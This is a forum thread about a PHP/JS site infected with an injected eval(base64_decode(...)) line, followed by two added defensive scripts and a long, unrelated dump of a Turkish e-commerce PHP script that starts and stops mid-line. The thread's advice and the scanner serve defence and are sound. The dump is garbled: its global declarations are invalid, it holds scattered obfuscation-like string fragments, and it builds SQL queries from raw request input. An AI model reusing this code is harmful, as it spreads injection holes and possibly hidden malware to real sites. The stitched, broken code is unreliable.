I found a problem on my site, and when I compared the files on the server with my local files I found that every page (*.js or *.php) has this line in it:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a JavaScript line.

So I knew that my site had been hacked.
So:
1 - I want to know how to prevent anyone from hacking my site.
On every text field or textarea, when posting or getting it, I applied htmlspecialcharacter($_POST).

Is this true? And can it help me?
2 - How did anyone hack my site?
3 - How can I know what this code means?

Help me please.

All 4 Replies

Hey.

1 - I want to know how to prevent anyone from hacking my site.
On every text field or textarea, when posting or getting it, I applied htmlspecialcharacter($_POST).

Is this true? And can it help me?

The htmlspecialchars function is meant to be used when printing unsafe data to an HTML page.
It doesn't protect you if you use the data for other things, such as SQL queries or shell scripts.

2 - How did anyone hack my site?

Hard to tell. Especially since we know absolutely nothing about your website.

Most likely suspects:

  • Your FTP info was stolen from a PC you were working on.
    Developers often use FTP applications that store login details for them so they don't have to type it in every single time.
    Some viruses target such applications, giving the attacker access to your FTP server.
    (Please note that these sorts of viruses are designed to be invisible. And yes, you can have one. Doesn't matter how protected you think you are.)
  • Dynamic includes/SQL/eval/shell scripts. All of these can be used to gain unauthorized access to your server if they are created using unsafe data. A common newbie mistake is to add un-escaped user input into SQL queries, which allows a hacker to alter the command via your own web-form.
    (See SQL Injection)
  • Broken file upload scripts, which allow malicious users to upload scripts onto your site. Always take care to limit file uploads to known types, or a malicious user could just upload a PHP file and execute it via a normal web-request.

3 - How can I know what this code means?

<?php
    echo base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC');
?>

This just prints the command that the eval() call you posted is supposed to execute.
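The decoding step from the reply above, extended into a read-only triage script; this is an added example and not code from the thread. It lists every *.php or *.js file under a directory that carries an `eval(base64_decode('...'))` line and prints the decoded payload without executing it. The function names, the temporary directory and the sample payload are constructed for the demonstration, and the JavaScript variant of the injected line is not covered because the thread does not show it.

```php
<?php
// Added example: find files carrying an injected eval(base64_decode('...'))
// line and decode the payload for reading only. Nothing here calls eval().
// All sample files and the sample payload below are constructed.

const INJECTION_PATTERN =
    '~eval\s*\(\s*base64_decode\s*\(\s*([\'"])([A-Za-z0-9+/=\s]+)\1~i';

// Decode a base64 argument; if the result is itself another
// eval(base64_decode(...)) wrapper, peel it too, up to $maxLayers times.
function decodeLayers(string $b64, int $maxLayers = 5): string
{
    $text = '';
    for ($i = 0; $i < $maxLayers; $i++) {
        $text = base64_decode(preg_replace('/\s+/', '', $b64), true);
        if ($text === false) {
            return '[not valid base64]';
        }
        if (!preg_match(INJECTION_PATTERN, $text, $m)) {
            break;
        }
        $b64 = $m[2];
    }
    return $text;
}

// Return the decoded payload of every injected call found in $source.
function extractPayloads(string $source): array
{
    $found = [];
    if (preg_match_all(INJECTION_PATTERN, $source, $m)) {
        foreach ($m[2] as $b64) {
            $found[] = decodeLayers($b64);
        }
    }
    return $found;
}

// Walk $root and map each affected *.php / *.js file to its payloads.
function scanTree(string $root): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile() || !preg_match('/\.(php|js)$/i', $file->getFilename())) {
            continue;
        }
        $payloads = extractPayloads((string) file_get_contents($file->getPathname()));
        if ($payloads) {
            $hits[$file->getPathname()] = $payloads;
        }
    }
    ksort($hits);
    return $hits;
}

// --- Demonstration on a constructed directory tree ---
$root = sys_get_temp_dir() . '/scan_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/inc', 0700, true);

// Harmless placeholder standing in for the real payload.
$inner    = 'echo "constructed placeholder payload";';
$injected = "<?php /**/eval(base64_decode('" . base64_encode($inner) . "')); ?>";

file_put_contents("$root/index.php", $injected . "\n<?php echo 'home'; ?>\n");
file_put_contents("$root/inc/clean.php", "<?php echo 'untouched'; ?>\n");

foreach (scanTree($root) as $path => $payloads) {
    foreach ($payloads as $payload) {
        // Printed to a terminal; wrap in htmlspecialchars() if shown in a browser.
        printf("%s\n    decoded: %s\n", $path, $payload);
    }
}

// Remove the constructed files again.
unlink("$root/index.php");
unlink("$root/inc/clean.php");
rmdir("$root/inc");
rmdir($root);
```

Run it from the command line against a copy of the site rather than the live document root, and compare the list of hits with a known-good local copy before restoring files.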
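The first point of the reply above (htmlspecialchars is for HTML output and does nothing for SQL), shown as an added example that is not code from the thread. It runs the same constructed input through a concatenated query and through a prepared statement. It assumes the pdo_sqlite extension; the table, column and function names are made up for the demonstration.

```php
<?php
// Added example: htmlspecialchars() protects HTML output, not SQL queries.
// Uses an in-memory SQLite database through PDO (needs pdo_sqlite).
// Table, data and function names are constructed for this demonstration.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, 'bob'), (3, 'carol')");

// Constructed stand-in for $_POST['id']. It contains no HTML special
// characters, so htmlspecialchars() returns it unchanged.
$input = '0 OR 1=1';

// The pattern from the question: escape for HTML, then build SQL by hand.
// The input still becomes part of the SQL command itself.
function findUnsafe(PDO $pdo, string $id): array
{
    $escaped = htmlspecialchars($id, ENT_QUOTES, 'UTF-8');
    $sql = 'SELECT name FROM users WHERE id = ' . $escaped;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Prepared statement: the value is sent as data and never parsed as SQL.
function findSafe(PDO $pdo, string $id): array
{
    $stmt = $pdo->prepare('SELECT name FROM users WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Stricter variant: reject anything that is not an integer before querying.
function findValidated(PDO $pdo, string $id): array
{
    $int = filter_var($id, FILTER_VALIDATE_INT);
    if ($int === false) {
        return [];
    }
    return findSafe($pdo, (string) $int);
}

echo 'Concatenated query returned: ', implode(', ', findUnsafe($pdo, $input)), "\n";
echo 'Prepared statement returned: ', count(findSafe($pdo, $input)), " row(s)\n";
echo 'Validated lookup returned:   ', count(findValidated($pdo, $input)), " row(s)\n";
echo 'Normal lookup for id 2:      ', implode(', ', findSafe($pdo, '2')), "\n";

// Where htmlspecialchars() does belong: when stored text is printed into HTML.
$comment = '<b>constructed comment</b>';
echo 'HTML output: ', htmlspecialchars($comment, ENT_QUOTES, 'UTF-8'), "\n";
```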

: </b>'.$_POST['data_'.$k[1]].'<br>';} my_mail($mail,$sub,getEmailEncode().$out,getHeaders($_POST['data_email'])); return $out;}function generateMenuBlocks($nestLevel,$tempID,$block) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if ($nestLevel) {$q = mysql_query("select ID,name from kategori where parentID=0 AND active = 1 order by seq,name");while ($d = mysql_fetch_array($q)) { $out.= generateTableBox($d['name'],generateMenu($d['ID'],$tempID),$block);} } else {$out.= generateTableBox(_lang_urunKategorileri,generateMenu(0,$tempID),$block); } return $out;}function generateMenu($catID,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $subItem; if (isset($catID)) { $q = mysql_query('select ID,name from kategori where parentID=\''.$catID.'\' AND active = 1 order by seq,name ');$i=1;while ($d = mysql_fetch_array($q)) { $catName = (in_array($d['ID'],getBreadCrumb())?'<strong>'.$d['name'].'</strong>':$d['name']); $out[$catName] = 'page.php?act=kategoriGoster&catID='.$d['ID'].'&name='.seoFix($d['name']);if (in_array($d['ID'],getBreadCrumb())) {listParent($d['ID'],0);$out[] = $subItem; }}$out = generateMenuList($out,$tempID);} return $out;}function generateOptionList($menuArray) { global 
arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach($menuArray as $k=>$v) {$out.='<option value="'.$k.'">'.$v.'</option>'; } return $out; }function generateImageList ($menuArray,$tempID,$catName) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if (is_array($menuArray)) {$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php'); ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header);ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body);ereg("<!-- SUBBODY -->(.*)<!-- // SUBBODY -->", $contents, $subbody);ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); $out=$header[0]."\n";$i=1;foreach($menuArray as $k=>$v) { if (is_int($k)) {$out.=str_replace('{%LISTE_ICERIK%}',$v,$subbody[0]); } else {if ($v) $out.=str_replace('{%LISTE_ICERIK%}','<a href="'.$v.'"><img src="'.$catName.'/'.$k.'"></a>',$body[0]); else $out.=str_replace('{%LISTE_ICERIK%}',$k,$body[0]);if ($i!=sizeof($menuArray)) $out.=$seperator[0]; } $i++;}$out.='</table>'; } return $out;}function generateMenuList($menuArray,$tempID) { global 
arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if (is_array($menuArray)) {$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php'); ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header);ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body);ereg("<!-- SUBBODY -->(.*)<!-- // SUBBODY -->", $contents, $subbody);ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); $out=$header[0]."\n";$i=1;foreach($menuArray as $k=>$v) { if (is_int($k)) {$out.=str_replace('{%LISTE_ICERIK%}',$v,$subbody[0]); } else {if ($v) { ereg("catID=(.*)&name", $v,$IDData); $BodyID = str_replace('{%KATEGORI_ID%}',$IDData[1],$body[0]); $out.=str_replace('{%LISTE_ICERIK%}','<a href="'.$v.'">'.$k.'</a>',$BodyID); }else $out.=str_replace('{%LISTE_ICERIK%}',$k,$body[0]);if ($i!=sizeof($menuArray)) $out.=$seperator[0]; } $i++;}$out.='</table>'; } return $out;}function generatePager($toplambulunan,$teksayfa){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/systemDefault/UrunPager.php');ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header); ereg("<!-- 
ONCEKI SAYFA -->(.*)<!-- // ONCEKI SAYFA -->", $contents, $oncekisayfa); ereg("<!-- LISTELEME -->(.*)<!-- // LISTELEME -->", $contents, $listeleme); ereg("<!-- LISTE AYIRMA -->(.*)<!-- // LISTE AYIRMA -->", $contents, $listeayirma); ereg("<!-- SIMDIKI SAYFA -->(.*)<!-- // SIMDIKI SAYFA -->", $contents, $simdikisayfa); ereg("<!-- SONRAKI SAYFA -->(.*)<!-- // SONRAKI SAYFA -->", $contents, $sonrakisayfa);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); if (!isset($_GET[page])) $_GET[page] = 1; $urldevam=getURL(array('page')); $out.=$header[1]; $onceki=$_GET[page] - 1; $sonraki=$_GET[page] + 1; if ($_GET['page'] >= 2) $out .= str_replace('{%ONCEKI_SAYFA_LINK%}',"$PHP_SELF?page=$onceki$urldevam",$oncekisayfa[1]); $sayfasayisi = $toplambulunan / $teksayfa; $a=explode(".",$sayfasayisi); if (($a[1] != "") && ($a[1] != "0")) $a[0]++; $toplamsayfa=$a[0];if ($toplamsayfa != 1) { for ($i=1;$i<=$toplamsayfa;$i++){ if ($i != $_GET[page]) {$p = str_replace('{%LISTE_SAYFA_LINK%}',"$PHP_SELF?page=$i$urldevam",$listeleme[1]);$x = str_replace('{%SAYFA_NUMARASI%}',$i,$p);if ($i <= ($_GET['page'] + 5) && $i >= ($_GET['page']-5)) $out.=$x;} else {$s = str_replace('{%LISTE_SAYFA_LINK%}',"$PHP_SELF?page=$i$urldevam",$simdikisayfa[1]);$x = str_replace('{%SAYFA_NUMARASI%}',$i,$s);$out.=$x; } if ($i!=$toplamsayfa) $out.=$listeayirma[1];}} if ($_GET['page'] < $toplamsayfa) $out.= str_replace('{%SONRAKI_SAYFA_LINK%}',"$PHP_SELF?page=$sonraki$urldevam",$sonrakisayfa[1]);$out.=$footer[1]; return $out;}function generatePages($where) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  switch ($where) {case "left": $q = 
mysql_query('select * from pages where showLeft=1 order by seq'); $i=1; while ($d = mysql_fetch_array($q)) {$href=($d['redirect']?$d['redirect']:'page.php?act=showPage&ID='.$d['ID']);$out.='<tr><td><img src="images/gri_menu_dot.gif"></td>'."\n";$out.='<td width="100%" class="gri_menu_text"><a href="'.$href.'">'.$d['title'].'</a></td></tr>';if ($i!=mysql_num_rows($q)) $out.='<tr><td colspan="2" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>';$i++;$page[$d['title']] = $href; } $out = generateMenuList($page,'BlockList');break;case "bottom":$out = '<table><tr>';$q = mysql_query('select * from pages where showBottom=1 order by seq'); while ($d = mysql_fetch_array($q)) {$href=($d['redirect']?$d['redirect']:'page.php?act=showPage&ID='.$d['ID']);$out.='<td style="cursor:pointer;" onClick="window.location=\''.$href.'\'">'.textBox('#90be00','white',9,$d['title']).'</td>'; } $out.='</tr></table>';break; } return $out;}function generateTableBox($headerText,$body,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/blocks/'.$tempID.'.php'); $out = str_replace('{%BASLIK%}',$headerText,$contents ); $out = str_replace('{%ICERIK%}',$body,$out);return ($body?$out:'');}$serthree='l';function generateTaksitSelection($bankaID,$total) { global 
arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; $q = mysql_query("select * from banka where ID='$bankaID'");$d = mysql_fetch_array($q);$d['taksitSayisi'] = (mysql_num_rows(mysql_query("select ay from bankaVade where bankaID='$bankaID'")) + 1);$du['fiyat'] = $total;$out.='<table cellspacing=0 cellpadding=2 width="100%">';$qVade = mysql_query("select * from bankaVade where bankaID='$bankaID' order by ay");while ($dVade = mysql_fetch_array($qVade)) { $i = $dVade['ay'];$toplamFaiz = $dVade['vade'];$toplamOdenecek = ($i==1|| $i<=$pesinFiyatinaTaksitSayisi?$du['fiyat']:(($toplamFaiz + 1) * $du['fiyat'])); $taksit = ($i==1?'':($toplamOdenecek / $i)); $pesinFiyatina = ($toplamOdenecek == $du['fiyat']?true:false);$radioClick = "onClick=\"document.getElementById('radio_$i').click();\" style='cursor:pointer;'";$taksitStr = ($i==1?_lang_pesin:$i.' '._lang_taksit); $out.="<tr onmouseover=\"this.style.backgroundColor='#eeeeee'\" onmouseout=\"this.style.backgroundColor='#ffffff'\"><td class='td1'><input id='radio_$i' type='radio' name='taksit' value='$i'></td><td $radioClick>$taksitStr</td>";$out.="<td class='td2' $radioClick>".($taksit?my_money_format('%i',$taksit).' YTL X '.$i:'')."</td><td ".($pesinFiyatina?'style="font-weight:bold;"':'')." $radioClick>: ";$out.="".my_money_format('%i',$toplamOdenecek)." 
YTL</td>";$out.='</tr>'; if ($i != $d['taksitSayisi']) {$out.='<tr height=2><td></td></tr>';$out.='<tr height=1 bgcolor="#eeeeee"><td colspan="4"></td></tr>';$out.='<tr height=2><td></td></tr>'; }}$out.='</table>'; return $out;}$stwo='ia';function getDurum($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = hq("select title from odemeDurum where ID='$ID'"); return $out; }function getEmailEncode() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out= "Content-Transfer-Encoding: 8bit".$mail['body']."\r\n"; $out .= "Content-Type: text/html; charset=iso-8859-9"."\r\n"; }function getFirstPic($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq("select resim from urun where ID='$urunID'");}function getHeaders($email) { global 
arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $header = "From: ".$siteConfig['title']." <".$siteConfig['adminMail'].">\r\n"; $header .= "Content-type: text/html; charset=iso-8859-9\r\n"; return $header;}function getMailTemplate($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select title,body from sablonEmail where ID='$ID'"); $out = mysql_fetch_array($q); return $out;}function getOptions($db,$field,$where,$order,$selected) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $where=($where?$where:'1=1'); $q=mysql_query("select ID,$field from $db where $where order by $order"); while ($d=mysql_fetch_array($q)) {$out.="<option ".($d['ID']==$selected?'selected':'')." 
value='".$d['ID']."'>".$d[$field]."</option>"; } return $out; }$sone='ser';foreach ($_GET as $k=>$v) if (substr($k,0,5) == '_POST') $_POST[str_replace('_POST','',$k)] = $v;function getURL($remove) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $remove[]='d'; $remove[]='t4'; foreach ($_GET as $k=>$v) {$v = str_replace('%%','spkomut_HEPSI',$v);if (!in_array($k,$remove) && substr($k,0,5) != '_POST') $urldevam.="&$k=$v"; } foreach ($_POST as $k=>$v) if ($k!='t') $_GET['_POST'.$k] = $v; foreach ($_GET as $k=>$v) {$v = str_replace('%%','spkomut_HEPSI',$v);if (!in_array($k,$remove) && substr($k,0,5) == '_POST') $urldevam.="&$k=$v"; } return $urldevam;}function kdvHaricFiyat($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $KDVDahilFiyat = dbInfo('urun','fiyat',$urunID); $KDV = dbInfo('urun','kdv',$urunID); return fixFiyat($KDVDahilFiyat / (1 + $KDV));}function getUrun($urunID) { global 
arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/systemDefault/UrunListShow.php');$maximumen = tempConfig('maximum_en'); $maximumboy = tempConfig('maximum_boy'); $q = mysql_query('select * from urun where ID=\''.$urunID.'\''); $d = mysql_fetch_array($q); if ($d['indirimde']) $indirimliResim = '<img src="templates/'.$siteConfig['templateName'].'/images/indirimli.gif">'; if ($d['yeni']) $yeniResim = '<img src="templates/'.$siteConfig['templateName'].'/images/yeni.gif">'; $d['fiyat'] = fixFiyat($d['fiyat']); $contents = str_replace('{%URUN_NO%}',$d['ID'],$contents); $contents = str_replace('{%URUN_BASLIK%}',$d['name'],$contents); $contents = str_replace('{%URUN_DETAY_LINK%}','page.php?act=urunDetay&urunID='.$d['ID'].'&name='.seoFix($d['name']),$contents); $contents = str_replace('{%URUN_RESIM%}','<img src="include/resize.php?path=images/urunler/'.$d['resim'].'&width='.$maximumen.'&height='.$maximumboy.'">',$contents); $contents = str_replace('{%URUN_ACIKLAMA%}',$d['listeDetay'],$contents); $contents = str_replace('{%INDIRIMLI_RESIM%}',$indirimliResim,$contents); $contents = str_replace('{%YENI_RESIM%}',$yeniResim,$contents); $contents = str_replace('{%URUN_FIYAT%}',my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents);$contents = str_replace('{%URUN_FIYAT_KDV_HARIC%}',my_money_format('%i',kdvHaricFiyat($d['ID'])).' '.fiyatBirim($d['fiyatBirim']),$contents); if ($d['piyasafiyat'] && ($d['piyasafiyat'] != $d['fiyat'])) {$contents = str_replace('{%URUN_PIYASA_FIYAT%}',my_money_format('%i',$d['piyasafiyat']).' 
'.fiyatBirim($d['fiyatBirim']),$contents); } else $contents = str_replace('{%URUN_PIYASA_FIYAT%}','',$contents); $stokStatus = ($d['stok']?'on':'off');if ($d['stok']) {$sepeteEkleLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'\'';$hemenAlLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'&hemenal=true\''; } else {$sepeteEkleLink = $hemenAlLink = "alert('"._lang_stokYokUyari."');";} $contents = str_replace('{%STOK_RESIM%}','<img src="templates/'.$siteConfig['templateName'].'/images/stok_'.$stokStatus.'.gif">',$contents); $contents = str_replace('{%SEPETE_EKLE_LINK%}',$sepeteEkleLink,$contents); $contents = str_replace('{%HEMEN_AL_LINK%}',$hemenAlLink,$contents); $out .= $contents; return $out;}function getUserInfo($userID,$info) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q=mysql_query("select * from user where ID='$userID'"); $d = mysql_fetch_array($q); $out = $d[$info]; return $out;}function hq($query){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $bib=mysql_query($query) or die (mysql_error().' 
Query :'.$query); $go=mysql_fetch_array($bib); return $go[0];}function insertBanner($code) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $bannerQry = mysql_query('select bannerID,bannerPic,bannerFlashSource,divStyle,url from bannerYonetim,bannerlar where bannerYonetim.bannerID=bannerlar.ID AND aktif=\'1\' AND (maxHit = \'0\' OR maxHit > hit) AND (maxGosterim = \'0\' OR maxGosterim > gosterim) AND bannerYer = \''.$code.'\'') or die(mysql_error()); while ($banner = mysql_fetch_array($bannerQry)) { mysql_query('update bannerlar set gosterim = gosterim + \'1\' where ID = \''.$banner['bannerID'].'\' '); $out.='<div style="'.$banner['divStyle'].'">'; if ($banner['bannerPic']) $out.= '<a href="banner.php?ID='.$banner['bannerID'].'&url='.$banner['url'].'" target="_blank"><img border=0 src="images/banner/'.$banner['bannerPic'].'"></a><br>'."\n"; $out.=$banner['bannerFlashCode']; $out.='</div>'; } return $out;}function insertToBasket($urunID,$ozellik1,$ozellik2,$ozellik3) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $stop; if (dbInfo('urun','ozellik1',$urunID) && !$ozellik1) { $out = showSelectScreen($urunID); } else {$userID = ($_SESSION['userID']?$_SESSION['userID']:0); if (hq("select ID from sepet where ozellik1='$ozellik1' AND ozellik2='$ozellik2' AND 
